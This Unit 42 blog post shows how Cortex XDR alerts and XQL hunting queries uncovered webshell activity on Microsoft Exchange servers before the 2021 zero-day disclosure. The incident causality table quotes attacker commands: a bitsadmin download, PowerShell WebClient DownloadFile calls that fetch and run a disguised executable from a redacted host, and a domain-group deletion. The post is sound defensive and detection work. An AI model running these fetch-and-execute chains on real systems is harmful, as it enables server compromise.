* [Blog](https://www.paloaltonetworks.com/blog) * [Security Operations](https://www.paloaltonetworks.com/blog/security-operations/) * [Must-Read Articles](https://www.paloaltonetworks.com/blog/security-operations/category/must-read-articles/) * Busted by XDR: Detecting ... # Busted by XDR: Detecting Microsoft Exchange Post-Exploit Activity in February [](https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Fwww.paloaltonetworks.com%2Fblog%2Fsecurity-operations%2Fbusted-by-xdr-detecting-microsoft-exchange-post-exploit-activity-in-february%2F) [](https://twitter.com/share?text=Busted+by+XDR%3A+Detecting+Microsoft+Exchange+Post-Exploit+Activity+in+February&url=https%3A%2F%2Fwww.paloaltonetworks.com%2Fblog%2Fsecurity-operations%2Fbusted-by-xdr-detecting-microsoft-exchange-post-exploit-activity-in-february%2F) [](https://www.linkedin.com/shareArticle?mini=true&url=https%3A%2F%2Fwww.paloaltonetworks.com%2Fblog%2Fsecurity-operations%2Fbusted-by-xdr-detecting-microsoft-exchange-post-exploit-activity-in-february%2F&title=Busted+by+XDR%3A+Detecting+Microsoft+Exchange+Post-Exploit+Activity+in+February&summary=&source=) [](https://www.paloaltonetworks.com//www.reddit.com/submit?url=https://www.paloaltonetworks.com/blog/security-operations/busted-by-xdr-detecting-microsoft-exchange-post-exploit-activity-in-february/&ts=markdown) \[\](mailto:?subject=Busted by XDR: Detecting Microsoft Exchange Post-Exploit Activity in February) Link copied By [Unit 42](https://www.paloaltonetworks.com/blog/author/unit-42/?ts=markdown "Posts by Unit 42") Apr 01, 2021 9 minutes [Must-Read Articles](https://www.paloaltonetworks.com/blog/security-operations/category/must-read-articles/?ts=markdown) [News and Events](https://www.paloaltonetworks.com/blog/security-operations/category/news-and-events/?ts=markdown) [behavioral analytics](https://www.paloaltonetworks.com/blog/tag/behavioral-analytics/?ts=markdown) [Cortex XDR](https://www.paloaltonetworks.com/blog/tag/cortex-xdr/?ts=markdown) [exploits](https://www.paloaltonetworks.com/blog/tag/exploits/?ts=markdown) [Incident Response](https://www.paloaltonetworks.com/blog/tag/incident-response/?ts=markdown) [Machine Learning](https://www.paloaltonetworks.com/blog/tag/machine-learning/?ts=markdown) [malware](https://www.paloaltonetworks.com/blog/tag/malware/?ts=markdown) [Microsoft Exchange](https://www.paloaltonetworks.com/blog/tag/microsoft-exchange/?ts=markdown) [microsoft exchange server](https://www.paloaltonetworks.com/blog/tag/microsoft-exchange-server/?ts=markdown) [threat assessment](https://www.paloaltonetworks.com/blog/tag/threat-assessment/?ts=markdown) [zero-day](https://www.paloaltonetworks.com/blog/tag/zero-day/?ts=markdown) ## Executive Summary On March 2, Microsoft released security updates to mitigate four critical zero-day Microsoft Exchange Server vulnerabilities that were actively exploited by a threat group they call HAFNIUM. Since the initial attacks, Unit 42 and a number of other threat intelligence teams have observed multiple threat actors exploiting these zero-day vulnerabilities in the wild. Shortly after the public disclosure, we published a [Threat Assessment](https://unit42.paloaltonetworks.com/microsoft-exchange-server-vulnerabilities/) and a [threat hunting](https://www.paloaltonetworks.com/blog/security-operations/attacks-targeting-microsoft-exchange/?ts=markdown) blog post explaining how to actively defend against these specific vulnerabilities. In this blog post, our goal is to highlight how our Managed Threat Hunting team was able to detect these zero-day threats using Cortex XDR before the Microsoft Exchange vulnerabilities were publicly disclosed. This naturally resulted in our clients being able to prevent these threat actors from conducting post-exploit activity before many of their peers in the industry. ## Managed Threat Hunting The Cortex XDR Managed Threat Hunting (MTH) team is a group of cybersecurity specialists that provide threat hunting services to a subset of Cortex XDR customers. In this section we will be walking through how MTH team members identified and investigated a number of incidents tied to the ongoing exploitation of the recent Microsoft Exchange Server vulnerabilities. This step by step deep dive will hopefully give readers a glimpse into how the critical combination of machine learning in Cortex XDR and human expertise help identify and action zero-day threats. #### ***Initial Detection*** In several of the cases we investigated, the Cortex XDR [analytics engine](https://docs.paloaltonetworks.com/cortex/cortex-xdr/cortex-xdr-pro-admin/analytics/analytics-concepts.html) raised an "[Uncommon net group execution](https://docs.paloaltonetworks.com/cortex/cortex-xdr/cortex-xdr-analytics-alert-reference/cortex-xdr-analytics-alert-reference/uncommon-net-group-execution.html)" alert. This immediately caught our attention because adversaries often abuse the [net utility](https://attack.mitre.org/software/S0039/) tool. |-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| | The 'net group' command was executed on \[REDACTED\]. Child process command line: net group "Exchange Organization administrators" administrator /del /domain. 0 other such command invocations were made in the last 30 days | *Table 1. Alert details.* The Cortex XDR behavioral analytics engine detected this command invocation as an anomaly based on its machine learning models. The behavioral analytics engine works by profiling the behavior of users, hosts, endpoint processes, and more using machine learning and then generates an alert if it detects anomalous activity indicative of attacks. Behavioral analytics allows Cortex XDR to uncover stealthy attacker tactics and techniques with an exceptionally low rate of false positives. In this instance, once Cortex XDR detected the attack activity, security teams were able to immediately visualize the chain of events leading to this alert, trace it back to the parent process, CMD.exe, and view the causality actor process, w3wp.exe, which was a Microsoft IIS worker process. **![Figure 1: Causality view](https://www.paloaltonetworks.com/blog/wp-content/uploads/2021/04/word-image-11.png)** \*Figure 1:\*Causality view A review of the command line arguments for the IIS worker process found that it was associated with the "MSExchangeOWAAppPool" application pool. ![Figure 2: w3wp.exe process with MSExchangeOWAAppPool.](https://www.paloaltonetworks.com/blog/wp-content/uploads/2021/04/word-image-12.png) *Figure 2: w3wp.exe process with* MSExchangeOWAAppPool\*.\* Based on the information Cortex XDR had presented to us so far, we knew that this host was a Microsoft Exchange Server and we suspected it may be compromised with a webshell. #### ***Investigation*** Once we had an idea that we may be dealing with a webshell, we turned to [XQL Search](https://docs.paloaltonetworks.com/cortex/cortex-xdr/cortex-xdr-xql-language-reference.html) to answer the following questions we had surrounding this activity: 1. Were any webshells recently dropped on this server? |---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| | //Exchange IIS process writing ASPX files to disk dataset = xdr\_data |filter **event\_type** = FILE AND event\_sub\_type IN (FILE\_CREATE\_NEW, FILE\_WRITE) |filter lowercase(**actor\_process\_image\_name**) = "w3wp.exe" |filter lowercase(**action\_file\_extension**) = "aspx" |fields **agent\_hostname** , **actor\_process\_image\_path** , **actor\_process\_image\_command\_line** , **action\_file\_path** , **action\_file\_sha256** | *Table 2. XQL Query* The goal of our initial search was to look for the IIS worker process writing ASPX files to disk. This resulted in the identification of the following file: |----------------------------------------------------------------| | C:\\inetpub\\wwwroot\\aspnet\_client\\system\_web\\brLBlE7h.aspx | Table 3. Webshell path A closer look at brLBlE7h.aspx determined that it was an ASPX page that had a China Chopper webshell embedded in the ExternalURL parameter. ![Figure 3: China Chopper webshell](https://www.paloaltonetworks.com/blog/wp-content/uploads/2021/04/word-image-13.png) Figure 3: China Chopper webshell 1. Was a webshell used to run any other suspicious commands? Our next query was aimed at obtaining a quick overview of any processes the Exchange IIS worker may have spawned: |---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| | //Exchange IIS sub process breakdown dataset = xdr\_data |filter lowercase(**os\_actor\_process\_image\_name** ) = "w3wp.exe" and lowercase(**os\_actor\_process\_command\_line**) contains "exchange" |filter **action\_process\_image\_name** !=null |comp count\_distinct(**action\_process\_image\_command\_line** ) as Count by **agent\_hostname** , **causality\_actor\_process\_image\_name** , **action\_process\_image\_name** | *Table 4. XQL Query* ![Figure 4: Query results](https://www.paloaltonetworks.com/blog/wp-content/uploads/2021/04/word-image-14.png) *Figure 4: Query results* At the same time, we also ran a separate query that would provide us with more details on any commonly abused reconnaissance executables spawned by IIS: |----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| | //Exchange IIS process launching executables commonly used for reconnaissance purposes. dataset = xdr\_data |filter **os\_actor\_process\_image\_name** = "w3wp.exe" |filter **event\_type** = PROCESS and **event\_sub\_type** = PROCESS\_START and lowercase(**action\_process\_image\_name**) in ("arp.exe","hostname.exe","ntdutil.exe","schtasks.exe","at.exe","ipconfig.exe","pathping.exe","systeminfo.exe","bitsadmin.exe","nbtstat.exe","ping.exe","tasklist.exe","certutil.exe","net.exe","powershell.exe","tracert.exe","cmd.exe","net1.exe","qprocess.exe","ver.exe","dsget.exe","netdom.exe","query.exe","vssadmin.exe","dsquery.exe","netsh.exe","qwinsta.exe","wevtutil.exe","find.exe","netstat.exe","reg.exe","whoami.exe","findstr.exe","nltest.exe","rundll32.exe","wmic.exe","fsutil.exe","nslookup.exe","sc.exe","wusa.exe") |fields **agent\_hostname** , **os\_actor\_process\_command\_line** , **agent\_version** , **actor\_effective\_username** , **action\_process\_image\_name** , **action\_process\_image\_command\_line** ,**actor\_process\_image\_name** , **actor\_process\_image\_command\_line** | *Table 5. XQL Query* This query didn't result in any findings outside of the initial net group event that was flagged by the Cortex XDR Analytics Engine: |-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| | "cmd" /c cd /d "C:\\\\inetpub\\\\wwwroot\\\\aspnet\_client\\\\system\_web"\&net group "Exchange Organization administrators" administrator /del /domain\&echo \[S\]\&cd\&echo \[E\] | *Table 6. Query results* ***Managed Threat Hunting Response*** At this point, we reached out to this customer and other customers with similar cases with our initial findings. Thanks to the early warning from Cortex XDR, the customers were able to isolate the endpoint using Cortex XDR and initiate their incident response process before the attack escalated. An impact report was later sent out to all of our Managed Threat Hunting customers, informing them about the Exchange Vulnerabilities and recommended actions to ensure their environments were protected. Cortex XDR customers who purchase an optional [Managed Threat Hunting](https://www.paloaltonetworks.com/cortex/managed-threat-hunting?ts=markdown) subscription receive impact reports, threat reports, and guidance to quickly resolve incidents. ## Threat Detection with Cortex XDR Another example of a successfully contained incident occurred with another Cortex XDR customer prior to Microsoft's disclosure. Cortex XDR alerted the user of malicious activities in the form of [incident reports](https://docs.paloaltonetworks.com/cortex/cortex-xdr/cortex-xdr-pro-admin/monitoring/incidents-table). Incidents are created from higher severity alerts, while relevant lower severity alerts are grouped into it. This ensures a minimum number of false positive incidents while allowing Cortex XDR to maximize the available information given in a single incident. For example, the following alert created an incident: |---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| | \* The Windows Script Host powershell.exe connected to the domain \ using the IP \ \* powershell -enc \ \* 0 other endpoints connected to this external ip over the last 30 days \* 0 other endpoints connected to this external domain over the last 30 days | *Table 7.* [Script Connecting to Rare External Host](https://docs.paloaltonetworks.com/cortex/cortex-xdr/cortex-xdr-analytics-alert-reference/cortex-xdr-analytics-alert-reference/script-connecting-to-rare-external-host.html) alert And these alerts were grouped into it: |-----------------|-----------------------------------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| | **Source** | **Alert** | **Description** | | Cortex XDR BIOC | Bitsadmin.exe used to download data | Some attacks were known to abuse [BITSAdmin](https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/) in the past to hide how data is downloaded using legitimate Windows tools | | Cortex XDR BIOC | Commonly-abused process spawned by web server | Web server processes should normally only carry out tasks related to serving web applications | | Cortex XDR BIOC | PowerShell runs base64-encoded commands | Running PowerShell with a base64-encoded payload in the command line is often used by attackers to evade detection | *Table 8. Alert details.* By observing [the causality of the incident](https://docs.paloaltonetworks.com/cortex/cortex-xdr/cortex-xdr-pro-admin/investigation-and-response/investigate-endpoint-alerts/causality-view.html), we can see multiple "red flags" that are indicative of the use of a webshell that downloads and runs a second stage malware: |------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| | **c:\\windows\\system32\\inetsrv\\w3wp.exe -ap "MSExchangeOWAAppPool" ...** **# Raised info alert: Bitsadmin.exe used to download data** **"C:\\Windows\\System32\\bitsadmin.exe" /rawreturn /transfer getfile http://\/3.avi c:\\Users\\$USER$\\2.bat** **# Raised info alert: Commonly-abused process spawned by web server** **"C:\\Windows\\System32\\cmd.exe" /c c:\\Users\\$USER$\\2.bat** **cmd /c mkdir C:\\\\users\\\\public\\\\opera** **# Raised medium** **alert: Script Connecting to Rare External Host** **# Raised info alert: PowerShell runs base64-encoded commands** **powershell -enc \:** **(new-object System.Net.WebClient).DownloadFile('http://\/news/opera\_browser.dll','C:\\users\\public\\opera\\opera\_browser.dll')** **(new-object System.Net.WebClient).DownloadFile('http://\/news/code','C:\\users\\public\\opera\\code')** **(new-object System.Net.WebClient).DownloadFile('http://\/news/opera\_browser.png','C:\\users\\public\\opera\\opera\_browser.png')** **(new-object System.Net.WebClient).DownloadFile('http://\/news/opera\_browser.exe','C:\\users\\public\\opera\\opera\_browser.exe')** **# Raised info alert: Commonly-abused process spawned by web server** **powershell Start-Sleep -Seconds 10** **cmd /c C:\\\\users\\\\public\\\\opera\\\\opera\_browser.exe** **C:\\\\users\\\\public\\\\opera\\\\opera\_browser.exe** **msiexec.exe -k** | *Table 9. Causality of the incident.* We have seen multiple similar cases prior to Microsoft's disclosure, one as early as February 23. After Microsoft's disclosure, we observed a major uptick in related alerts detected by Cortex XDR as seen in this graph: ![Figure 6. Hit count graph](https://www.paloaltonetworks.com/blog/wp-content/uploads/2021/04/word-image-15.png) *Figure 6. Hit count graph* ## Conclusion In this post we have documented investigations that originated from Cortex XDR behavioral analytics alerts and resulted in identification and resolution of threats related to Microsoft Exchange Server vulnerabilities prior to any public disclosures. The onset of these alerts by the machine learning models in XDR was the critical catalyst in numerous cases and expert follow-up by the XDR Managed Threat Hunting specialists led to swift containment of the threat way before any public disclosures were made. [Managed Threat Hunting](https://www.paloaltonetworks.com/cortex/managed-threat-hunting?ts=markdown), an add-on service for Cortex XDR, lets you augment your team with Unit 42 threat hunters, who continuously monitor and search through your Cortex XDR data to uncover emerging threats in your environment. ### Additional Resources * [Hunting for the Recent Attacks Targeting Microsoft Exchange](https://www.paloaltonetworks.com/blog/security-operations/attacks-targeting-microsoft-exchange/?ts=markdown) * [Analyzing Attacks Against Microsoft Exchange Server With China Chopper Webshells](https://unit42.paloaltonetworks.com/china-chopper-webshell/) * [Threat Assessment: Active Exploitation of Four Zero-Day Vulnerabilities in Microsoft Exchange Server](https://unit42.paloaltonetworks.com/microsoft-exchange-server-vulnerabilities/) * [HAFNIUM targeting Exchange Servers with 0-day exploits](https://docs.google.com/document/u/0/d/1FHFjilP-ZH2JEyUGVJWolTe--PRIkrDPCAFiIJvuBZ8/edit) * [Operation Exchange Marauder: Active Exploitation of Multiple Zero-Day Microsoft Exchange Vulnerabilities](https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/) * [Detect and Prevent Web Shell Malware](https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF) *** ** * ** *** ## Related Blogs ### [Must-Read Articles](https://www.paloaltonetworks.com/blog/security-operations/category/must-read-articles/?ts=markdown), [Use-Cases](https://www.paloaltonetworks.com/blog/security-operations/category/use-cases/?ts=markdown) [#### Battling macOS Malware with Cortex AI](https://www.paloaltonetworks.com/blog/security-operations/battling-macos-malware-with-cortex-ai/) ### [Must-Read Articles](https://www.paloaltonetworks.com/blog/security-operations/category/must-read-articles/?ts=markdown), [News and Events](https://www.paloaltonetworks.com/blog/security-operations/category/news-and-events/?ts=markdown) [#### Barracuda Networks Has a Predator that Can't be Patched](https://www.paloaltonetworks.com/blog/security-operations/barracuda-networks-has-a-predator-that-cant-be-patched/) ### [Announcement](https://www.paloaltonetworks.com/blog/category/announcement/?ts=markdown), [Must-Read Articles](https://www.paloaltonetworks.com/blog/security-operations/category/must-read-articles/?ts=markdown), [News and Events](https://www.paloaltonetworks.com/blog/security-operations/category/news-and-events/?ts=markdown), [Products and Services](https://www.paloaltonetworks.com/blog/category/products-and-services/?ts=markdown), [Unit 42](https://www.paloaltonetworks.com/blog/category/unit42/?ts=markdown), [Web Security](https://www.paloaltonetworks.com/blog/category/web-security/?ts=markdown) [#### Unit 42 Strikes Oil in MITRE Engenuity Managed Services Evaluation](https://www.paloaltonetworks.com/blog/2022/11/unit-42-mitre-managedservices-2022/) ### [Must-Read Articles](https://www.paloaltonetworks.com/blog/security-operations/category/must-read-articles/?ts=markdown), [News and Events](https://www.paloaltonetworks.com/blog/security-operations/category/news-and-events/?ts=markdown), [Uncategorized](https://www.paloaltonetworks.com/blog/category/uncategorized/?ts=markdown) [#### Cortex XDR 3.4: Elevating SecOps with SmartScore \& Single Sign-on](https://www.paloaltonetworks.com/blog/security-operations/cortex-xdr-3-4-elevating-management-scale-security/) ### [Must-Read Articles](https://www.paloaltonetworks.com/blog/security-operations/category/must-read-articles/?ts=markdown), [News and Events](https://www.paloaltonetworks.com/blog/security-operations/category/news-and-events/?ts=markdown) [#### Prevention, Hunting and Playbooks for MSDT Zero-Day (CVE-2022-30190)](https://www.paloaltonetworks.com/blog/security-operations/prevention-hunting-and-playbooks-for-msdt-zero-day-cve-2022-30190/) ### [Announcement](https://www.paloaltonetworks.com/blog/category/announcement/?ts=markdown), [Must-Read Articles](https://www.paloaltonetworks.com/blog/security-operations/category/must-read-articles/?ts=markdown), [News and Events](https://www.paloaltonetworks.com/blog/security-operations/category/news-and-events/?ts=markdown), [Product Features](https://www.paloaltonetworks.com/blog/security-operations/category/product-features/?ts=markdown), [Products and Services](https://www.paloaltonetworks.com/blog/category/products-and-services/?ts=markdown) [#### The Third Generation of XDR Has Arrived!](https://www.paloaltonetworks.com/blog/2021/08/third-generation-xdr-has-arrived/) ### Subscribe to Security Operations Blogs! Sign up to receive must-read articles, Playbooks of the Week, new feature announcements, and more. ![spinner](https://www.paloaltonetworks.com/blog/wp-content/themes/panwblog2023/dist/images/ajax-loader.gif) Sign up Please enter a valid email. By submitting this form, you agree to our [Terms of Use](https://www.paloaltonetworks.com/legal-notices/terms-of-use?ts=markdown) and acknowledge our [Privacy Statement](https://www.paloaltonetworks.com/legal-notices/privacy?ts=markdown). Please look for a confirmation email from us. If you don't receive it in the next 10 minutes, please check your spam folder. This site is protected by reCAPTCHA and the Google [Privacy Policy](https://policies.google.com/privacy) and [Terms of Service](https://policies.google.com/terms) apply. {#footer} {#footer} ## Products and Services * [AI-Powered Network Security Platform](https://www.paloaltonetworks.com/network-security?ts=markdown) * [Secure AI by Design](https://www.paloaltonetworks.com/precision-ai-security/secure-ai-by-design?ts=markdown) * [Prisma AIRS](https://www.paloaltonetworks.com/prisma/prisma-ai-runtime-security?ts=markdown) * [AI Access Security](https://www.paloaltonetworks.com/sase/ai-access-security?ts=markdown) * [Cloud Delivered Security Services](https://www.paloaltonetworks.com/network-security/security-subscriptions?ts=markdown) * [Advanced Threat Prevention](https://www.paloaltonetworks.com/network-security/advanced-threat-prevention?ts=markdown) * [Advanced URL Filtering](https://www.paloaltonetworks.com/network-security/advanced-url-filtering?ts=markdown) * [Advanced WildFire](https://www.paloaltonetworks.com/network-security/advanced-wildfire?ts=markdown) * [Advanced DNS Security](https://www.paloaltonetworks.com/network-security/advanced-dns-security?ts=markdown) * [Enterprise Data Loss Prevention](https://www.paloaltonetworks.com/sase/enterprise-data-loss-prevention?ts=markdown) * [Enterprise IoT Security](https://www.paloaltonetworks.com/network-security/enterprise-device-security?ts=markdown) * [Medical IoT Security](https://www.paloaltonetworks.com/network-security/medical-device-security?ts=markdown) * [Industrial OT Security](https://www.paloaltonetworks.com/network-security/medical-device-security?ts=markdown) * [SaaS Security](https://www.paloaltonetworks.com/sase/saas-security?ts=markdown) * [Next-Generation Firewalls](https://www.paloaltonetworks.com/network-security/next-generation-firewall?ts=markdown) * [Hardware Firewalls](https://www.paloaltonetworks.com/network-security/hardware-firewall-innovations?ts=markdown) * [Software Firewalls](https://www.paloaltonetworks.com/network-security/software-firewalls?ts=markdown) * [Strata Cloud Manager](https://www.paloaltonetworks.com/network-security/strata-cloud-manager?ts=markdown) * [SD-WAN for NGFW](https://www.paloaltonetworks.com/network-security/sd-wan-subscription?ts=markdown) * [PAN-OS](https://www.paloaltonetworks.com/network-security/pan-os?ts=markdown) * [Panorama](https://www.paloaltonetworks.com/network-security/panorama?ts=markdown) * [Secure Access Service Edge](https://www.paloaltonetworks.com/sase?ts=markdown) * [Prisma SASE](https://www.paloaltonetworks.com/sase?ts=markdown) * [Application Acceleration](https://www.paloaltonetworks.com/sase/app-acceleration?ts=markdown) * [Autonomous Digital Experience Management](https://www.paloaltonetworks.com/sase/adem?ts=markdown) * [Enterprise DLP](https://www.paloaltonetworks.com/sase/enterprise-data-loss-prevention?ts=markdown) * [Prisma Access](https://www.paloaltonetworks.com/sase/access?ts=markdown) * [Prisma Browser](https://www.paloaltonetworks.com/sase/prisma-browser?ts=markdown) * [Prisma SD-WAN](https://www.paloaltonetworks.com/sase/sd-wan?ts=markdown) * [Remote Browser Isolation](https://www.paloaltonetworks.com/sase/remote-browser-isolation?ts=markdown) * [SaaS Security](https://www.paloaltonetworks.com/sase/saas-security?ts=markdown) * [AI-Driven Security Operations Platform](https://www.paloaltonetworks.com/cortex?ts=markdown) * [Cloud Security](https://www.paloaltonetworks.com/cortex/cloud?ts=markdown) * [Cortex Cloud](https://www.paloaltonetworks.com/cortex/cloud?ts=markdown) * [Application Security](https://www.paloaltonetworks.com/cortex/cloud/application-security?ts=markdown) * [Cloud Posture Security](https://www.paloaltonetworks.com/cortex/cloud/cloud-posture-security?ts=markdown) * [Cloud Runtime Security](https://www.paloaltonetworks.com/cortex/cloud/runtime-security?ts=markdown) * [Prisma Cloud](https://www.paloaltonetworks.com/prisma/cloud?ts=markdown) * [AI-Driven SOC](https://www.paloaltonetworks.com/cortex?ts=markdown) * [Cortex XSIAM](https://www.paloaltonetworks.com/cortex/cortex-xsiam?ts=markdown) * [Cortex XDR](https://www.paloaltonetworks.com/cortex/cortex-xdr?ts=markdown) * [Cortex XSOAR](https://www.paloaltonetworks.com/cortex/cortex-xsoar?ts=markdown) * [Cortex Xpanse](https://www.paloaltonetworks.com/cortex/cortex-xpanse?ts=markdown) * [Unit 42 Managed Detection \& Response](https://www.paloaltonetworks.com/cortex/managed-detection-and-response?ts=markdown) * [Managed XSIAM](https://www.paloaltonetworks.com/cortex/managed-xsiam?ts=markdown) * [Threat Intel and Incident Response Services](https://www.paloaltonetworks.com/unit42?ts=markdown) * [Proactive Assessments](https://www.paloaltonetworks.com/unit42/assess?ts=markdown) * [Incident Response](https://www.paloaltonetworks.com/unit42/respond?ts=markdown) * [Transform Your Security Strategy](https://www.paloaltonetworks.com/unit42/transform?ts=markdown) * [Discover Threat Intelligence](https://www.paloaltonetworks.com/unit42/threat-intelligence-partners?ts=markdown) ## Company * [About Us](https://www.paloaltonetworks.com/about-us?ts=markdown) * [Careers](https://jobs.paloaltonetworks.com/en/) * [Contact Us](https://www.paloaltonetworks.com/company/contact-sales?ts=markdown) * [Corporate Responsibility](https://www.paloaltonetworks.com/about-us/corporate-responsibility?ts=markdown) * [Customers](https://www.paloaltonetworks.com/customers?ts=markdown) * [Investor Relations](https://investors.paloaltonetworks.com/) * [Location](https://www.paloaltonetworks.com/about-us/locations?ts=markdown) * [Newsroom](https://www.paloaltonetworks.com/company/newsroom?ts=markdown) ## Popular Links * [Blog](https://www.paloaltonetworks.com/blog/?ts=markdown) * [Communities](https://www.paloaltonetworks.com/communities?ts=markdown) * [Content Library](https://www.paloaltonetworks.com/resources?ts=markdown) * [Cyberpedia](https://www.paloaltonetworks.com/cyberpedia?ts=markdown) * [Event Center](https://events.paloaltonetworks.com/) * [Manage Email Preferences](https://start.paloaltonetworks.com/preference-center) * [Products A-Z](https://www.paloaltonetworks.com/products/products-a-z?ts=markdown) * [Product Certifications](https://www.paloaltonetworks.com/legal-notices/trust-center/compliance?ts=markdown) * [Report a Vulnerability](https://www.paloaltonetworks.com/security-disclosure?ts=markdown) * [Sitemap](https://www.paloaltonetworks.com/sitemap?ts=markdown) * [Tech Docs](https://docs.paloaltonetworks.com/) * [Unit 42](https://unit42.paloaltonetworks.com/) * [Do Not Sell or Share My Personal Information](https://panwedd.exterro.net/portal/dsar.htm?target=panwedd) ![PAN logo](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/pan-logo-dark.svg) * [Privacy](https://www.paloaltonetworks.com/legal-notices/privacy?ts=markdown) * [Trust Center](https://www.paloaltonetworks.com/legal-notices/trust-center?ts=markdown) * [Terms of Use](https://www.paloaltonetworks.com/legal-notices/terms-of-use?ts=markdown) * [Documents](https://www.paloaltonetworks.com/legal?ts=markdown) Copyright © 2026 Palo Alto Networks. All Rights Reserved * [![Youtube](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/youtube-black.svg)](https://www.youtube.com/user/paloaltonetworks) * [![Podcast](https://www.paloaltonetworks.com/content/dam/pan/en_US/images/icons/podcast.svg)](https://www.paloaltonetworks.com/podcasts/threat-vector?ts=markdown) * [![Facebook](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/facebook-black.svg)](https://www.facebook.com/PaloAltoNetworks/) * [![LinkedIn](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/linkedin-black.svg)](https://www.linkedin.com/company/palo-alto-networks) * [![Twitter](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/twitter-x-black.svg)](https://twitter.com/PaloAltoNtwks) * EN Select your language